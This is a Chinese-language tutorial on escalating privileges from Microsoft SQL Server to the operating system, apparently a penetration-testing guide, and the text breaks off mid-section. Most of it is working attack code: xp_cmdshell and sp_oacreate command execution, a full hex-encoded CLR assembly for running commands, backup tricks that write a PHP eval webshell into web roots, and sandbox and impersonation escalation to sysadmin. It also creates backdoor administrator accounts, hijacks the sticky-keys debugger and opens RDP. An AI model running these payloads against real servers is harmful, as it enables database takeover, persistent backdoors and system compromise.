一文詳解MSSQL提權(quán)的相關(guān)知識(shí)

判斷當(dāng)前用戶權(quán)限

sa權(quán)限：數(shù)據(jù)庫(kù)操作，文件管理，命令執(zhí)行，注冊(cè)表讀取等system。SQLServer數(shù)據(jù)庫(kù)的最高權(quán)限

db權(quán)限：文件管理，數(shù)據(jù)庫(kù)操作等權(quán)限 users-administrators

public權(quán)限：數(shù)據(jù)庫(kù)操作 guest-users

判斷是否是SA權(quán)限

select is_srvrolemember('sysadmin')

判斷是否是db_owner權(quán)限

select is_member('db_owner')

判斷是否是public權(quán)限

select is_srvrolemember('public')

使用xp_cmdshell執(zhí)行系統(tǒng)命令(sa權(quán)限)

xp_cmdshell默認(rèn)在mssql2000中是開啟的，在mssql2005之后默認(rèn)禁止，但未刪除

判斷xp_cmdshell狀態(tài)

我們可以在master.dbo.sysobjects中查看xp_cmdshell狀態(tài)

只用判斷存在，利用count(*)即可。

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'

xtype為對(duì)象類型，xtype='x'這里表示xp_cmdshell的對(duì)象類型為擴(kuò)展存儲(chǔ)過程。

存在即返回1 ? ?

啟用xp_cmdshell

如果xp_cmdshell權(quán)限沒開啟的話，我們可以利用EXEC啟用xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

也可以用如下語(yǔ)句：

execute('sp_configure "show advanced options",1') *#**將該選項(xiàng)的值設(shè)置為**1*

execute('reconfigure')        *#**保存設(shè)置*

execute('sp_configure "xp_cmdshell", 1')    *#**將**xp_cmdshell**的值設(shè)置為**1*

execute('reconfigure')        *#**保存設(shè)置

恢復(fù)被刪除的xp_cmdshell

若xp_cmdshell被刪除，可以上傳xplog70.dll進(jìn)行恢復(fù)刪除的xp_cmdshell

Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\xplog70.dll'

利用xp_cmdshell執(zhí)行命令

通過xp_cmdshell執(zhí)行系統(tǒng)命令指令如下: （master.. 可以不加）

exec master..xp_cmdshell 'whoami'

利用xp_cmdshell寫文件

先利用 dir 找到web服務(wù)根目錄

exec master..xp_cmdshell 'dir'

然后通過 echo 將一句話木馬寫入文件，即可連webshell

exec xp_cmdshell 'echo test>d:1.txt'

最后命令關(guān)閉xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

使用sp_oacreate+sp_oamethod執(zhí)行系統(tǒng)命令(sa權(quán)限)

當(dāng) xp_cmdshell 被刪除可以使用這個(gè)來提權(quán)試試，恢復(fù) sp_oacreate

sp_oacreate 是一個(gè)非常危險(xiǎn)的存儲(chǔ)過程可以刪除、復(fù)制、移動(dòng)文件。還能配合 sp_oamethod 來寫文件執(zhí)行 cmd。

使用sp_oacreate提權(quán)前提條件：

系統(tǒng)管理員使用sp_configure啟用sp_oacreate和sp_oamethod系統(tǒng)存儲(chǔ)過程對(duì)OLE自動(dòng)化過程的訪問（OLE Automation Procedures）

在效果方面，sp_oacreate、sp_oamethod兩個(gè)過程和xp_cmdshell過程功能類似，因此可以替換使用！

利用條件：

1.已獲取到sqlserver sysadmin權(quán)限用戶的賬號(hào)與密碼且未降權(quán)（如2019版本sa用戶權(quán)限為mssqlserver，已降權(quán)）

2.sqlserver允許遠(yuǎn)程連接

查看sp_oacreate狀態(tài)

select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE';

返回1表示存在sp_oacreate系統(tǒng)存儲(chǔ)過程

開啟存儲(chǔ)過程

先開啟存儲(chǔ)過程(語(yǔ)句中間沒有空格，以下語(yǔ)句是一起執(zhí)行):

exec sp_configure 'show advanced options', 1;
RECONFIGURE;
exec sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;

執(zhí)行命令

此時(shí)可以執(zhí)行系統(tǒng)命令了，但是使用 sp_oacreate 執(zhí)行系統(tǒng)命令不回顯:

wscript.shell 執(zhí)行命令

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'

可以使用以下命令創(chuàng)建用戶hack:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystem32cmd.exe /c net user hack Password@ /add'

由于無(wú)回顯，我們可以將命令執(zhí)行的結(jié)果寫的文件中，再將文件中的內(nèi)容讀到表中，最后查詢表中的內(nèi)容

1、執(zhí)行以下命令

declare @shell INT;

exec sp_oacreate 'wscript.shell',@shell output;

exec sp_oamethod @shell,'run',null,' c:windowssystem32cmd.exe /c whoami > C: emp1.txt ','0','true';

執(zhí)行打開cmd.exe文件并執(zhí)行whoami并將結(jié)果寫入到c: emp1.txt中

2、 再將創(chuàng)建的文件1.txt寫入到readfile表中，查詢表中的內(nèi)容以驗(yàn)證上面命令是否執(zhí)行成功

Use model;

bulk insert readfile from 'C: emp1.txt'

WITH (

DATAFILETYPE = 'char',

KEEPNULLS

)

select * from readfile

使用CLR執(zhí)行系統(tǒng)命令(sa權(quán)限)

#啟用MSSQL CLR功能

exec sp_configure 'show advanced options', 1;
RECONFIGURE;
Exec sp_configure 'clr enabled', 1;
RECONFIGURE;

#為了導(dǎo)入了不安全的程序集，我們還需要將數(shù)據(jù)庫(kù)標(biāo)記為安全。

ALTER DATABASE [master] SET TRUSTWORTHY ON;

#導(dǎo)入程序集，單獨(dú)執(zhí)行

CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006643f55f0000000000000000e00022200b013000000e00000006000000000000022d0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000b02c00004f00000000400000b803000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000080d000000200000000e000000020000000000000000000000000000200000602e72737263000000b8030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000e42c00000000000048000000020005005c220000540a00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000be280e00000a72010000706f0f00000a280e00000a7243000070725300007002281000000a28020000066f0f00000a2a1b300600a40100000100001173040000060a731100000a0b076f1200000a026f1300000a03281400000a2d0c076f1200000a036f1500000a076f1200000a176f1600000a076f1200000a176f1700000a076f1200000a166f1800000a076f1200000a176f1900000a076f1200000a176f1a00000a06731b00000a7d010000040706fe0605000006731c00000a6f1d00000a140c076f1e00000a26076f1f00000a076f2000000a6f2100000a0c076f2200000ade390d280e00000a1b8d160000012516725d000070a2251702a2251803a225197291000070a2251a096f2300000aa2282400000a6f0f00000ade00076f2500000a2d1a280e00000a067b010000046f2600000a6f0f00000a3895000000731b00000a130408281400000a2d091104086f2700000a26067b010000046f2800000a2c20110472970000706f2700000a261104067b010000046f2600000a6f2700000a26280e00000a1c8d16000001251602a2251703a2251872af000070a22519076f2500000a13051205282900000aa2251a7291000070a2251b1104252d0426142b056f2600000aa2282400000a6f0f00000a067b010000046f2600000a2a011000000000870021a80039100000011e02282a00000a2a4e027b01000004046f2b00000a6f2700000a262a42534a4201000100000000000c00000076322e302e35303732370000000005006c00000038030000237e0000a4030000a804000023537472696e6773000000004c080000e80000002355530034090000100000002347554944000000440900001001000023426c6f620000000000000002000001571502000902000000fa013300160000010000001c000000030000000100000005000000050000002b0000000d000000010000000100000003000000010000000000b1020100000000000600ed01ae0306005a02ae03060038019b030f00ce03000006004c01cd020600d001cd020600b101cd0206004102cd0206000d02cd0206002602cd0206007901cd0206009401cd0206003004c6020a0063014e030e0009049b030600df02c602060020036e0406001d01ae030e00ee039b030a007a044e030a0015014e0306008e02c6020e00f7029b030e00c4009b030e0035039b0306000803360006001503360006002700c602000000002d00000000000100010001001000dd030000350001000100030110000100000035000100040006006404740050200000000096005e007800010080200000000096008b001a00020040220000000086189503060004004022000000008618950306000400482200000000830016007d000400000001007d0000000100e400000002001f04000001002e03000002000404090095030100110095030600190095030a00290095031000310095031000390095031000410095031000490095031000510095031000590095031000610095031000710095030600910095030600a1000c011500a90096001000b10029041a007900950306007900e9022d00b900d7001000b10098043200b90011041000b90085043700b900b4003c00b90078023700b9007b033700b90049043700890095030600c90095034200790066004800790043044e007900ed000600790069035200d900810057007900370406008100a8005700b10029045b0079009b00610069008c025700890001016500890095026100e1008c02570069009503060099004c005700200063000b012e000b0084002e0013008d002e001b00ac002e002300b5002e002b00cb002e003300cb002e003b00cb002e004300d1002e004b00e1002e005300cb002e005b00fe0063006b000b012000048000000100000000000000000000000000a00200000200000000000000000000006b005500000000000200000000000000000000006b004000000000000200000000000000000000006b00c60200000000030002000000003c3e635f5f446973706c6179436c617373315f30003c52756e436f6d6d616e643e625f5f3000496e743332003c4d6f64756c653e0053797374656d2e494f0053797374656d2e44617461006765745f44617461006d73636f726c696200436d6445786563006164645f4f757470757444617461526563656976656400636d640052656164546f456e640052756e436f6d6d616e640053656e64006765745f45786974436f6465006765745f4d657373616765007365745f57696e646f775374796c650050726f6365737357696e646f775374796c65007365745f46696c654e616d650066696c656e616d6500426567696e4f7574707574526561644c696e6500417070656e644c696e65006765745f506970650053716c5069706500436f6d70696c657247656e6572617465644174747269627574650044656275676761626c6541747472696275746500417373656d626c795469746c654174747269627574650053716c50726f63656475726541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c4578656375746500546f537472696e67006765745f4c656e6774680057617253514c4b69744d696e696d616c0057617253514c4b69744d696e696d616c2e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c6465720073656e646572004461746152656365697665644576656e7448616e646c6572004d6963726f736f66742e53716c5365727665722e536572766572006765745f5374616e646172644572726f72007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053746f72656450726f63656475726573004461746152656365697665644576656e744172677300617267730050726f63657373007365745f417267756d656e747300617267756d656e747300436f6e636174004f626a6563740057616974466f7245786974005374617274007365745f52656469726563745374616e646172644f7574707574007374644f75747075740053797374656d2e546578740053716c436f6e74657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d707479000000004143006f006d006d0061006e0064002000690073002000720075006e006e0069006e0067002c00200070006c006500610073006500200077006100690074002e00000f63006d0064002e00650078006500000920002f006300200000334f00530020006500720072006f00720020007700680069006c006500200065007800650063007500740069006e006700200000053a002000001753007400640020006f00750074007000750074003a0000372000660069006e00690073006800650064002000770069007400680020006500780069007400200063006f006400650020003d0020000000c1b0e79eb8eb6348be1e0c1d83c2d05800042001010803200001052001011111042001010e04000012550500020e0e0e0c0706120c123d0e1241124508042000125d040001020e0420010102052001011161052002011c180520010112650320000204200012690320000e0500010e1d0e0320000805200112450e08b77a5c561934e08903061245040001010e062002011c124d0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000001501001057617253514c4b69744d696e696d616c00000501000000000f01000a457975702043454c494b00001c010017687474703a2f2f6579757063656c696b2e636f6d2e747200000c010007312e302e302e3000000401000000d82c00000000000000000000f22c0000002000000000000000000000000000000000000000000000e42c0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c03000000000000000000005c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc020000010053007400720069006e006700460069006c00650049006e0066006f0000009802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d00650000000000000000004a0011000100460069006c0065004400650073006300720069007000740069006f006e0000000000570061007200530051004c004b00690074004d0069006e0069006d0061006c0000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e00300000004a001500010049006e007400650072006e0061006c004e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c00000000005400180001004c006500670061006c0043006f007000790072006900670068007400000068007400740070003a002f002f006500790075007000630065006c0069006b002e0063006f006d002e007400720000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000005200150001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c000000000036000b000100500072006f0064007500630074004e0061006d0065000000000045007900750070002000430045004c0049004b0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000043d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE;

#創(chuàng)建存儲(chǔ)過程,單獨(dú)執(zhí)行

CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;

#執(zhí)行命令

EXEC sp_cmdExec 'whoami';

#刪除該程序集

DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];

通過備份上傳木馬getshell(dbo權(quán)限)

備份拿 shell 也就涉及到了權(quán)限的問題，SA 權(quán)限不用說，沒有降權(quán)的話基本能做任何事情了，它數(shù)據(jù)庫(kù)權(quán)限是 db_owner，當(dāng)然其他用戶如果也擁有 db_owner 基本也可以通過備份拿下 shell，但是在設(shè)置目錄權(quán)限后就不行了。

路徑的尋找

需要路徑的我們一般有幾個(gè)思路：

報(bào)錯(cuò)尋找

字典

旁站信息收集

調(diào)用儲(chǔ)存過程來搜索

讀配置文件

這里我們著重討論一下儲(chǔ)存過程也就是這些函數(shù)來找我們的網(wǎng)站根目錄。一般我們可以用 xp_cmdshell、xp_dirtree、xp_dirtree、xp_subdirs

execute master..xp_dirtree 'c:'       //列出所有 c: 文件和目錄,子目錄 
execute master..xp_dirtree 'c:',1     //只列 c: 文件夾 
execute master..xp_dirtree 'c:',1,1   //列 c: 文件夾加文件

通過執(zhí)行 xp_dirtree 返回我們傳入的參數(shù)，如果沒有回顯的話，可以這樣創(chuàng)建一個(gè)臨時(shí)的表插入

id=1;CREATE TABLE tmp (dir varchar(8000),num int,num1 int);
id=1;insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1

xp_cmdshell 尋找路徑：

這個(gè) xp_cmdshell 找起來更加方便我們調(diào)用cmd的命令去搜索，比如我的web目錄有個(gè)1.aspx

C:UsersGee>for /r c: %i in (1*.aspx) do @echo %i
c:www1.aspx

所以只需要建立一個(gè)表，存在一個(gè) char 字段就可以了。

id=1;CREATE TABLE cmdtmp (dir varchar(8000));

id=1;insert into cmdtmp(dir) exec master..xp_cmdshell 'for /r c: %i in (1*.aspx) do @echo %i'

LOG備份Getshell

備份文件小，不容易出現(xiàn)臟數(shù)據(jù)，推薦使用

無(wú)論是LOG備份還是差異備份，都是利用備份的過程中寫入一句話木馬

SQLServer常見的備份策略：

每周一次完整備份

每天一次差異備份

每小時(shí)一次事務(wù)日志備份

利用前提：

目標(biāo)機(jī)器存在數(shù)據(jù)庫(kù)備份文件 ，也就是如下，我們利用test數(shù)據(jù)庫(kù)的話，則需要該test數(shù)據(jù)庫(kù)存在數(shù)據(jù)庫(kù)備份文件

知道網(wǎng)站的絕對(duì)路徑

該注入支持堆疊注入

alter database 數(shù)據(jù)庫(kù)名 set RECOVERY FULL;   #修改數(shù)據(jù)庫(kù)恢復(fù)模式為 完整模式
create table cmd (a image);        #創(chuàng)建一張表cmd，只有一個(gè)列 a，類型為image
backup log 數(shù)據(jù)庫(kù)名 to disk= 'C:phpstudyWWW1.php' with init;   #備份表到指定路徑
insert into cmd (a) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e);  #插入一句話到cmd表里
backup log 數(shù)據(jù)庫(kù)名 to disk='C:phpstudyWWW2.php';   #把操作日志備份到指定文件
drop table cmd;    #刪除cmd表

第四行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句話木馬 的16進(jìn)制表示

會(huì)在目標(biāo)網(wǎng)站根目錄下生成1.php和2.php文件，其中1.php 保存數(shù)據(jù)庫(kù)，2.php就是我們需要連接的木馬文件。

用菜刀連接即可

差異備份Getshell

注：差異備份有概率會(huì)把網(wǎng)站搞崩，所以不建議使用差異備份

利用前提：

知道網(wǎng)站的絕對(duì)路徑 C:phpstudyWWW

該注入支持堆疊注入

注：以下語(yǔ)句一條一條執(zhí)行

create table [dbo].[test] ([cmd] [image])

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x786965 backup log @a to disk = @s with init,no_truncate

insert into [test](cmd) values(0x3c3f70687020406576616c28245f504f53545b785d293b3f3e)

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000 backup log @a to disk=@s with init,no_truncate

Drop table [test]

這里第二行的 0x786965，是字符 xie 的16進(jìn)制表示，這里隨便填都可以

第三行的 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e 是一句話木馬 的16進(jìn)制表示

第四行的0x43003A005C00700068007000730074007500640079005C005700570057005C007300680065006C006C002E00700068007000是 C:phpstudyWWWshell.php 的16進(jìn)制表示

然后會(huì)在目標(biāo)網(wǎng)站根目錄下生成shell.php木馬文件

沙盒提權(quán)

沙盒模式是一種安全功能，用于限制數(shù)據(jù)庫(kù)只對(duì)控件和字段屬性中的安全且不含惡意代碼的表達(dá)式求值。如果表達(dá)式不使用可能以某種方式損壞數(shù)據(jù)的函數(shù)或?qū)傩裕ㄈ鏚ill 和 Shell 之類的函數(shù)），則可認(rèn)為它是安全的。當(dāng)數(shù)據(jù)庫(kù)以沙盒模式運(yùn)行時(shí)，調(diào)用這些函數(shù)的表達(dá)式將會(huì)產(chǎn)生錯(cuò)誤消息。

沙盒提權(quán)的原理就是jet.oledb（修改注冊(cè)表）執(zhí)行系統(tǒng)命令。數(shù)據(jù)庫(kù)通過查詢方式調(diào)用mdb文件，執(zhí)行參數(shù)，繞過系統(tǒng)本身自己的執(zhí)行命令，實(shí)現(xiàn)mdb文件執(zhí)行命令。

利用前提：

1.需要Microsoft.Jet.OLEDB.4.0一般在32位系統(tǒng)才可以，64位機(jī)需要12.0，較復(fù)雜

2.dnary.mdb和ias.mdb兩個(gè)文件 在win2003上默認(rèn)存在，也可自行準(zhǔn)備

xp_regwrite 可用、關(guān)閉沙盒模式

復(fù)現(xiàn)環(huán)境

SQL Server2008 (Win2003-x32)
IP: 192.168.112.173

1）測(cè)試 jet.oledb 能否使用

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasias.mdb','select shell("cmd.exe /c whoami")')

在SQL2005默認(rèn)是禁用Ad Hoc Distributed，執(zhí)行命令時(shí)，會(huì)提示錯(cuò)誤。需要開啟

2）開啟Ad Hoc Distributed Queries組件

exec sp_configure 'show advanced options',1 ;
reconfigure ;
exec sp_configure 'Ad Hoc Distributed Queries',1 ;
reconfigure;

類似的，關(guān)閉組件命令

exec sp_configure 'show advanced options',1 ;
reconfigure ;
exec sp_configure 'Ad Hoc Distributed Queries',0 ;
reconfigure;

3）關(guān)閉沙盒模式

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;

沙盒模式`SandBoxMode`參數(shù)含義（默認(rèn)是2）
0：在任何所有者中禁止啟用安全模式
1：為僅在允許范圍內(nèi)
2：必須在access模式下
3：完全開啟

查看命令：

exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines', 'SandBoxMode'

關(guān)閉命令：

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',2

4）執(zhí)行命令

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:windowssystem32iasias.mdb','select shell("cmd.exe /c whoami >c:\sqltest.txt ")');

在win2003的c盤上看到已經(jīng)創(chuàng)建了該文件，命令執(zhí)行成功

同樣，可以創(chuàng)建用戶

Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net user testq QWEasd123 /add")');

Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net localgroup administrators testq /add")');

Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:windowssystem32iasias.mdb','select shell("net user testq")');

可信數(shù)據(jù)庫(kù)(DBO用戶提權(quán)到DBA)

1 預(yù)設(shè)存在漏洞的配置

打開SQL Server Management Studio，登錄sa用戶 。

點(diǎn)擊“新建查詢”，創(chuàng)建數(shù)據(jù)庫(kù)名為“TestDb”。

CREATE DATABASE TestDb;

新建測(cè)試用戶TestUser。

CREATE LOGIN TestUser WITH PASSWORD = 'Passw0rd';

使用如下的TSQL語(yǔ)句，數(shù)據(jù)庫(kù)TestDb的db_owner權(quán)限賦予給用戶TestUser。

USE TestDb
ALTER LOGIN [TestUser] with default_database = [TestDb];
CREATE USER [TestUser] FROM LOGIN [TestUser];
EXEC sp_addrolemember [db_owner], [TestUser];

設(shè)置TestDb數(shù)據(jù)庫(kù)為可信，這個(gè)是漏洞存在的關(guān)鍵。

ALTER DATABASE TestDb SET TRUSTWORTHY ON

下面的查詢語(yǔ)句會(huì)返回SQL Server實(shí)例中所有的數(shù)據(jù)庫(kù)中，可信數(shù)據(jù)庫(kù)的標(biāo)記情況，is_trustworthy_on開關(guān)為1即可信?？梢钥吹絋estDb已設(shè)置為可信數(shù)據(jù)庫(kù)。

SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.name=b.name;

2漏洞利用過程

使用TestUser用戶登錄數(shù)據(jù)庫(kù)。

嘗試開啟xp_cmdshell，可以看到權(quán)限不夠。

EXEC sp_configure 'show advanced options','1' --確保show advances options 的值為1
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell',1 --開啟xp_cmdshell
RECONFIGURE
GO

查詢是否sysadmin角色權(quán)限，顯示0，還不是sysadmin權(quán)限。

SELECT is_srvrolemember('sysadmin')

創(chuàng)建存儲(chǔ)過程sp_elevate_me。

USE TestDb
GO
CREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember 'TestUser','sysadmin'
GO

接下來，執(zhí)行上述sp_elevate_me存儲(chǔ)過程，給TestUser用戶添加sysadmin角色。

USE TestDb
EXEC sp_elevate_me

再次嘗試開啟xp_cmdshell，并且執(zhí)行whoami?？吹铰┒蠢贸晒α?。

3 msf自動(dòng)化提權(quán)

msf已經(jīng)內(nèi)置了攻擊模塊

auxiliary/admin/mssql/mssql_escalate_dbowner，直接調(diào)用即可。如果是從sql注入點(diǎn)提權(quán)，就使用模塊

mssql_escalate_dbowner_sqli。

我的攻擊參數(shù)配置如下：

use auxiliary/admin/mssql/mssql_escalate_dbowner
SET RHOSTS 192.168.234.130
SET USERNAME TestUser
SET PASSWORD Passw0rd
run

用戶模擬(DBO用戶提權(quán)到DBA)

1預(yù)設(shè)存在漏洞的配置

使用sa帳戶登錄SQL Server，創(chuàng)建4個(gè)新用戶。

CREATE LOGIN MyUser1 WITH PASSWORD = 'MyPassword!';
CREATE LOGIN MyUser2 WITH PASSWORD = 'MyPassword!';
CREATE LOGIN MyUser3 WITH PASSWORD = 'MyPassword!';
CREATE LOGIN MyUser4 WITH PASSWORD = 'MyPassword!';

賦予用戶MyUser1權(quán)限模擬 MyUser2, MyUser3,及sa，這個(gè)是漏洞存在的關(guān)鍵。在實(shí)戰(zhàn)中，未必能遇到模擬sa用戶特權(quán)的情況，但如果開發(fā)人員模擬了MyUser2或者M(jìn)yUser3，就能從MyUser1訪問其它數(shù)據(jù)庫(kù)資源。

USE master;
GRANT IMPERSONATE ON LOGIN::sa to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser2 to [MyUser1];
GRANT IMPERSONATE ON LOGIN::MyUser3 to [MyUser1];
GO

2漏洞利用過程

切換MyUser1用戶登錄數(shù)據(jù)庫(kù)。

執(zhí)行如下SQL語(yǔ)句，可以快速找到允許被模擬的用戶列表。

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'

執(zhí)行下面語(yǔ)言，在執(zhí)行了EXECUTE AS LOGIN語(yǔ)句后，成功模擬sa用戶特權(quán)。

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

EXECUTE AS LOGIN = 'sa'

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')

3 msf自動(dòng)化提權(quán)

同樣的，這個(gè)漏洞也有對(duì)應(yīng)的msf攻擊模塊。如果是從sql注入點(diǎn)提權(quán)，就選擇mssql_escalate_execute_as_sqli。

我的攻擊參數(shù)配置如下：

use auxiliary/admin/mssql/mssql_escalate_execute_as
set RHOSTS 192.168.234.130
set USERNAME MyUser1
set PASSWORD MyPassword!
run

映像劫持提權(quán)

2008以上，05未測(cè)試

通過使用xp_regwrite存儲(chǔ)過程對(duì)注冊(cè)表進(jìn)行修改，替換成任意值，造成鏡像劫持。

前提條件：

1.未禁止注冊(cè)表編輯（即寫入功能）

2.xp_regwrite啟用

復(fù)現(xiàn)

1）查看xp_regwrite是否啟用

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'

2）xp_regwrite開啟與關(guān)閉

EXEC sp_configure 'show advanced options', 1
RECONFIGURE
EXEC sp_configure 'xp_regwrite',1
RECONFIGURE

3）利用regwrite函數(shù)修改組注冊(cè)表進(jìn)行劫持

EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:windowssystem32cmd.exe'

4）查看是否修改成功文件

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe','Debugger'

顯示已修改為cmd.exe

在目標(biāo)主機(jī)上查看，結(jié)果一致

5）驗(yàn)證是否成功

連按5次粘滯鍵，彈出cmd框

拓展

上面對(duì)只是對(duì)粘滯鍵進(jìn)行修改，類似的，可以在注冊(cè)表中進(jìn)行其他操作

刪除指定注冊(cè)表鍵值對(duì)

刪除粘滯鍵的鍵值

xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe'

到目標(biāo)主機(jī)上查看，發(fā)現(xiàn)sethc.exe在注冊(cè)表中的值已刪除

開啟3389端口

這里的xp_regwrite為向注冊(cè)表中寫數(shù)據(jù)

exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminal Server','fDenyTSConnections','REG_DWORD',0;

exec master..xp_cmdshell "REG ADD 'HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server' /v fDenyTSConnections /t REG_DWORD /d 0"

在注冊(cè)表中也可以看到3389端口被打開

JOB提權(quán)

原理是創(chuàng)建一個(gè)任務(wù)X，并執(zhí)行命令，對(duì)于命令執(zhí)行后的結(jié)果將返回給文檔job.txt

詳細(xì)過程

1、 啟動(dòng)sqlagent服務(wù)

exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

2、 創(chuàng)建任務(wù)X，X為任務(wù)名稱并執(zhí)行命令，命令執(zhí)行后的結(jié)果將返回給文檔job.txt

use msdb
exec sp_delete_job null,'x'
exec sp_add_job 'x'
